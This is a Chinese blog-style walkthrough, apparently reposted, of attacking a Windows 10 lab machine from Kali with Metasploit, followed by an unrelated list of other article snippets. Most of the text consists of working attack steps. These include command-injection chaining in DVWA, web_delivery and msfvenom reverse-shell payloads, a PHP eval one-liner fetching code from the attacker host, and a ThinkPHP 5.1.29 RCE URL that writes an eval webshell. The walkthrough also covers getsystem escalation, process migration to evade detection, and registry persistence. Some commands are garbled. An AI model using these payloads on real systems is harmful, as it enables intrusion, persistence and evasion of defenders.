msf攻击windows实例

环境:攻击机kali(192.168.129.139),目标机windows10(192.168.129.132)

方法一:通过web站点,使用无文件的方式攻击利用执行(命令执行漏洞)

方法二:通过web站点,上传webshel,返回给msf(msfvenom)

方法三:攻击其他端口服务,拿到meterpreter(445)

一、Nmap端口收集

nmap -sV -T4  192.168.129.132(扫描的可能比较慢,两个字:等待)

这里以80作为突破口(漏洞最多的就是它,先打它)

方式一、访问web站点,寻找可能点(这里我使用小皮面板搭建的dvwa靶场)

dirsearch  御剑  爆破目录

命令执行就是进行一个拼接

Vulnerability: Command Injection :: Damn Vulnerable Web Application (DVWA)

​​​​​​http://192.168.129.132/dvwa/vulnerabilities/exec/

注意安全等级改为low

127.0.0.1(ping自己)

使用&&拼接命令

此处有命令执行的权限了,就可以使用msf

利用命令执行漏洞,结合上一章的知识,我们可以怎么做?    

msfvenom生成payload

①python :

msfvenom  -p python/meterpreter/reverge_tcp LHOST=<Your IP 'Address> LPORT=<Your Port to

Connect On> -f raw >shell.py

②bash :

msfvenom -p cmd/unix/reverse_bash LHOST=<Your, IP Addreas>LPORT=<Youx, Port to

Connect On> -f raw>shell.sh

③pexl :

msfvenom -p cmd/unix/reverse_perl LHOST=<Your,IP Address>LPORT=くYour Port to Connect

0n> -f raw>shell.pl

1、当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时,web_delivery就派

上用场。

2、web delivery的主要目的是快速和受害者主机建立一条session。当受害者主机存在比如命令注

入、远程命令执行等问题时,攻击者可以使用web delivery生成的一条命令建立连接。

3、另外web delivery的payload不会在受害者主机磁盘上写文件,而是直接将攻击者服务器上的代

码加载到内存执行,有利于绕过检测。

4、web delivery支持php/python/powershell等多种脚本,使用不同的脚本的payload时需要通过set

target或2来设置是使用php还是python还是powershell等。

因为判断出是php的,所以可以做如下操作:

①use exploit/multi/script/web_delivery   //使用模块

②show options  //显示可设置参数

③set  lhost  指定目标ip   

show targets  //查看设置(php,python等等)

set  target  编号

show options 再次查看配置

④set  lport  指定端口

⑤run 执行

会生成一段代码,把代码复制,在上述开始时的127.0.0.1&&的位置处粘贴运行

此时还没有完成,因为没有配置php的环境变量(注意:对全部的用户进行配置(方式一))

干掉正占用的jobs

重新run执行

复制出生成的python代码(注意:要在一行)

同理方式进行运行

此时目的达成,拿到了meterpreter

操作步骤:

前提:测试拥有命令执行权限

①进入kali linux  启动msf

msfconsole

注意:如果启动不成功就多次启动尝试一下

search  web_delivery 

use  编号/需要的模块命令(这里我使用第一种)     use  1

show options  查看可以指定的payload

set payload php/meterpreter/reverse_tcp

set  lhost ip目标

set lport  端口

没有指定target

show targets 查看要指定的target

set target 1

show  options  查看

run 执行

进入客户端网站页面:执行

部分1:127.0.0.1&&

php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.129.132:8080/ncu6AXlH', false, stream_context_create(['ssl'=>['verify_peer'=>  部分2

分为以上两个部分

这里的攻击机没有收到任何回显:原因:因为这里搭建是使用的phpstudy,没有配置php的环境变

量,如果和java一样配置了环境变量的话(JDK) 。有兴趣自己去试试吧

我的位置在:C:\phpStudy\PHPTutorial\php(看你安装位置了)

注意:对全部的用户进行配置

尝试使用命令行执行,结果如下:

这里有python,我们切换python尝试

set target 0

注意:payload改回python

set payload python/meterpreter/reverse_tcp

run执行

注意:复制出来要一行(可以使用notepad++)

使用back命令是返回上一级  background后台执行

客户端运行(同理上)

jobs查看已经运行的,kill 编号 杀死在运行的   

我这边显示服务器拒绝连接:(暂未解决,可能是版本的问题,后续补上)

成功后应如下图所示:

sessions查看

session 2进入meterpreter

所有的杀毒软件都会栏powershell(远程执行时)一刀切(执行过程类似)和拔网线一样

方式二、访问web站点,寻找可能点(上传webshell)

示例:

dirsearch扫描

dirsearch可能kali中没有需要自己安装

方式一、apt-get安装

简单(命令:apt-get  install dirsearch)

①一般用法:

dirsearch  -u  url -e*

方式二、clone克隆方式

git clone https://github.com/maurosoria/dirsearch.git

然后在家目录进入dirsearch

cd dirsearch

然后再使用命令:

python3 dirsearch.py -u http://159.75.16.25 -e*    (-e*扫描所有文件)(此处只展示使用方法,不

是针对此案例的扫描)

本示例开始:

此版本php存在远程命令执行漏洞

上述帮助我们getshell

可以由此利用python和上传webshell进行攻击(前面已经有python例子了此处我们使用上传)

meterpreter功能很少,要提权,可能被IDS拦截,后渗透,可以使用免杀马和不死马进行上传。

这里我们上传(phpinfo,shell.php)

执行如下:

无报错

查看靶机(上传成功)

可以进行连接

适用webshell进行连接

蚁剑,冰蝎,哥斯拉,菜刀等工具

此处使用蚁剑(有时候使用这些工具时可能有莫名其妙的错误,不行就换工具)

此时拿到webshell了但它的权限很低,要拿到meterpreter

windows系统我们就有了上传权限,linux操作系统,我们就可以把木马上传到tmp目录下(因为

tmp目录下可读可写可执行)这是思露

马是msfvenom马,上去执行,拿到meterpreter(很清晰吧)

①use exploit/multi/handler

②show options

③set payload windows/meterpreter_reverse_tcp

④set  lhost   set   lport

⑤run   进行监听(这边监听者)

复制此段:windows/meterpreter_reverse_tcp

msfvenom -p windows/x64/meterpreter/reverse_tcp  lhost=192.168.129.139  lport=9999  -f exe -o  test.exe

这边会生成test.exe,把它上传到(连接上webshell的机器),肯定会查杀(设置好后,来到蚁

剑,根据webshell上传test.exe文件)

查看权限:

是有可执行权限的(右击,在此处打开终端)

此时kali中已经进入到了meterpreter

此时就可以去做一些事情了

①getuid

②getsystem   简单提权(使用注册表进行一个管道)原理自己去了解一下吧

注意:如果你是网站管理员,你发现网站很卡,很可能有别人种的病毒(查任务管理器,找到

test.exe,结束了此进程,那你就没得玩了)

这边直接断了,那不行,有什么办法,作伪装(加壳,免杀)如何伪装?

查看进程id,进行进程迁移,搞成正常进程

环境想让他再次跑起来:如上操作,run(kali)  ,stat  test.exe(蚁剑机),等待kali机回复

①getpid

②ps 查看哪些进程在运行

高权限可以往低权限迁移,反过来不行

③getsystem  迁移到最高权限system

④进行迁移(这里是最高权限之后迁)

⑤migrate  迁移id(自己想迁移的,觉得不会被容易发现的)

此服务就将上传的木马文件迁移到了phpstudy中

分布式操作系统可以一对二(自己去看原理)

phpstudy没有断

此时就找不到test.exe了

这就是进程迁移

植入后门一般是植入到注册表里边

上述方式2我们是迁移到phpstydy,它是有文件的,而方式1是没有没文件的(内存中运行)管理员

关掉就没了。再重启木马就被杀掉了(方式2有后门)怕后门查杀的话,查杀注册表(更容易被查

杀,不推荐)注册表了写一个东西,以此开机运行

实验:暂未做

thinkphp5.1.29下载链接:https://pan.baidu.com/s/1b1l1HD0EP6c4uqtlSYokng 

提取码:burp

直接解压放大小皮面板的www目录下,添加站点配置如下,php版本注意

页面显示:

测试漏洞:http://192.168.129.132/thinkphp/html/public/index.php?

s=/index/\think\request/cache&key=whoami|system

上马:

http://192.168.129.132/thinkphp/html/public/index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20eval($_POST[c]);?%3E

执行结果如下:

查看靶机:上传成功(真实场景是看不到的哈)/html/public

此时可以使用shell.php去连接webshell(注意这里暂时先不使用代理)

双击,成功连接(webshell工具成功上线)

连过之后,此时就可以上传木马(拿到webshell后,拿到meterpreter)拿到webshell windows系统

有上传权限,执行权限。

上传msfvenom生成的马

注意这里的lhost是攻击机ip,lport要一致(今天先到这里)

这里一直连接不上(防火墙,有效负载,监听设置,网络访问和路由,反病毒软件都检查了,没排

出来)

后期再补

多次尝试

一、Nmap端口收集

方式一、访问web站点,寻找可能点(这里我使用小皮面板搭建的dvwa靶场)

操作步骤:

方式二、访问web站点,寻找可能点(上传webshell)

本示例开始:


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/845572.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

提示工程(Prompt Engineering)和代码生成

文心一言 提示工程&#xff08;Prompt Engineering&#xff09;和代码生成之间的关系主要体现在如何通过精心设计的提示来指导或优化代码生成的过程。以下是关于提示工程和代码生成的详细解释&#xff1a; 一、提示工程&#xff08;Prompt Engineering&#xff09; 提示工程…

KotlinConf 2024:深入了解Kotlin Multiplatform (KMP)

KotlinConf 2024&#xff1a;深入了解Kotlin Multiplatform (KMP) 在近期的Google I/O大会上&#xff0c;我们推荐了Kotlin Multiplatform (KMP)用于跨移动、网页、服务器和桌面平台共享业务逻辑&#xff0c;并在Google Workspace中采用了KMP。紧接着&#xff0c;KotlinConf 2…

【设计模式深度剖析】【7】【结构型】【享元模式】| 以高脚杯重复使用、GUI中的按钮为例说明,并对比Java类库设计加深理解

&#x1f448;️上一篇:外观模式 | 下一篇:结构型设计模式对比&#x1f449;️ 设计模式-专栏&#x1f448;️ 目录 享元模式定义英文原话直译如何理解&#xff1f;字面理解例子&#xff1a;高脚杯的重复使用例子&#xff1a;GUI中的按钮传统方式使用享元模式 4个角色1. …

锻压设备智能制造工厂物联数字孪生平台,推进制造业数字化转型

锻压设备智能制造工厂物联数字孪生平台&#xff0c;推进制造业数字化转型。随着全球制造业的飞速发展&#xff0c;数字化转型已经成为企业提升竞争力、实现可持续发展的关键。在锻压设备智能制造领域&#xff0c;工业物联数字孪生平台以其强大的数据集成、分析和管理能力&#…

国际物流管理系统的选择:花钱不怕,就怕花冤枉钱

现在市场上的国际物流管理系统还是非常多的&#xff0c;想在这么多类型的系统中选择一套适合自己的系统确实不是个简单的事情。 尤其是现在很多物流商其实都是比较小的国际物流商&#xff0c;很多大型的&#xff0c;过于复杂的系统并不适合这个群体。那这个群体应该怎么选择国…

mfc140u.dll丢失的解决方法有哪些?怎么全面修复mfc140u.dll文件

mfc140u.dll丢失其实相对来说不太常见到&#xff0c;因为这个文件一般是不丢失的&#xff0c;不过既然有人遇到这种问题&#xff0c;那么小编一定满足各位&#xff0c;给大家详细的唠叨一下mfc140u.dll丢失的各种解决方法&#xff0c;教大家以最快最有效率的方法去解决mfc140u.…

AI播客下载:a16z (主题为AI、web3、生物技术等风险投资)

a16z播客是一个综合性的科技和创新领域的媒体平台&#xff0c;通过多种节目形式和丰富的内容&#xff0c;为广大听众提供了一个了解最新科技趋势和创新思维的窗口。a16z播客是由安德里森霍罗威茨&#xff08;Andreessen Horowitz&#xff0c;简称a16z&#xff09;推出的一个科技…

汽车MCU虚拟化--对中断虚拟化的思考(1)

目录 1.中断虚拟化的困惑 2.从R52入手 3.小结 1.中断虚拟化的困惑 在车控类控制器里&#xff0c;中断对于我们来说是非常宝贵的资源&#xff0c;可大幅提高系统实时性。 这些中断基本都属于实际物理硬中断(软中断另说)&#xff0c;例如对一个按键按下的中断响应&#xff0…

基于单片机的恒流开关电源 BUCK电路设计

1 前言 1.1课题研究意义 开关电源顾名思义&#xff0c;开关电源便是使用半导体开关器件&#xff08;如晶体管、场效应管、可控硅闸流管等&#xff09;&#xff0c;经过控制电路&#xff0c;使半导体开关器件不停地“导通”和“关闭”&#xff0c;让半导体开关器件对输入的电压…

AI炒股-批量爬取网易财经的要闻板块

工作任务和目标&#xff1a;批量爬取网易财经的要闻板块 在class"tab_body current"的div标签中&#xff1b; 标题和链接在&#xff1a;<a href"https://www.163.com/dy/article/J2UIO5DD051188EA.html">华为急需找到“松弛感”</a> 第一步&…

短剧源码:打造个性化的在线短剧观看平台

随着短视频和短剧内容的兴起&#xff0c;越来越多的用户开始追求快节奏、高效率的娱乐方式。短剧源码的开发&#xff0c;为满足这一需求提供了技术基础。本文将详细介绍短剧源码的构成&#xff0c;以及如何通过这一源码打造个性化的在线短剧观看平台。 一、首页设计 首页是用…

【C++题解】1448. 随机体能测试

问题&#xff1a;1448. 随机体能测试 类型&#xff1a;循环应用&#xff0c;嵌套循环 题目描述&#xff1a; 学校想随机抽取一部分同学参加体能测试&#xff0c;看看同学们的体能怎么样。 张老师想了一个办法&#xff0c;找出学号中含有 1 的同学&#xff0c;让他们参加体能测…

并发和异步编程:详细概述

01 Concurrency and Asynchronous Programming: a Detailed Overview 并发和异步编程:详细概述 Asynchronous programming is one of those topics many programmers find confusing. You come to the point when you think you’ve got it, only to later realize that the …

162.二叉树:填充每个节点的下一个右侧节点指针(力扣)

代码解决 /* // Definition for a Node. class Node { public:int val;Node* left;Node* right;Node* next;Node() : val(0), left(NULL), right(NULL), next(NULL) {}Node(int _val) : val(_val), left(NULL), right(NULL), next(NULL) {}Node(int _val, Node* _left, Node* _…

ipv6基础

地址 前缀子网主机位 PI法则3.14 前缀&#xff1a;3个16位 子网&#xff1a;1个16位 接口ID&#xff1a;4个16位 地址分类 未指定地址 ::/128 &#xff0c;类似于0.0.0.0 本地回环地址 ::1/128 &#xff0c;用于本地测试&#xff0c;类似于127.0.0.1 本地链路地址&#x…

利用GNSS IMU集成提高车道级定位精度

准确的定位对于很多不同的事情都是至关重要的。导航系统可以引导我们去某个地方&#xff0c;自动驾驶汽车可以利用这些数据在道路上安全行驶。尽管全球导航卫星系统(GNSS)在定位方面非常出色&#xff0c;但它们可能并不总是提供最准确的车道水平事实。解决这个问题的一个有希望…

如何矢将量数据转换为栅格数据

在我们分析GIS数据时&#xff0c;有时候也可能需要将矢量数据转换为栅格数据来使用&#xff0c;例如&#xff1a;使用AI图像识别技术进行GIS数据分析或导航的时候&#xff01;矢量数据就可能不满足需求了&#xff01; GIS数据转换器-矢量V5.0具有矢量数据转换为栅格数据的功能…

Python魔法之旅-魔法方法(07)

目录 一、概述 1、定义 2、作用 二、应用场景 1、构造和析构 2、操作符重载 3、字符串和表示 4、容器管理 5、可调用对象 6、上下文管理 7、属性访问和描述符 8、迭代器和生成器 9、数值类型 10、复制和序列化 11、自定义元类行为 12、自定义类行为 13、类型检…

linux部署运维1——centos7.9离线安装部署涛思taos2.6时序数据库TDengine

在实际项目开发过程中&#xff0c;并非一直都使用关系型数据库&#xff0c;对于工业互联网类型的项目来说&#xff0c;时序型数据库也是很重要的一种&#xff0c;因此掌握时序数据库的安装配置也是必要的技能&#xff0c;不过对于有关系型数据库使用的开发工作者来说&#xff0…

如何获取SSL证书,消除网站不安全警告

获取SSL证书通常涉及以下几个步骤&#xff1a; 选择证书颁发机构&#xff08;CA&#xff09;&#xff1a; 你需要从受信任的SSL证书颁发机构中选择一个&#xff0c;比如DigiCert、GlobalSign、JoySSL等。部分云服务商如阿里云、腾讯云也提供免费或付费的SSL证书服务。 生成证…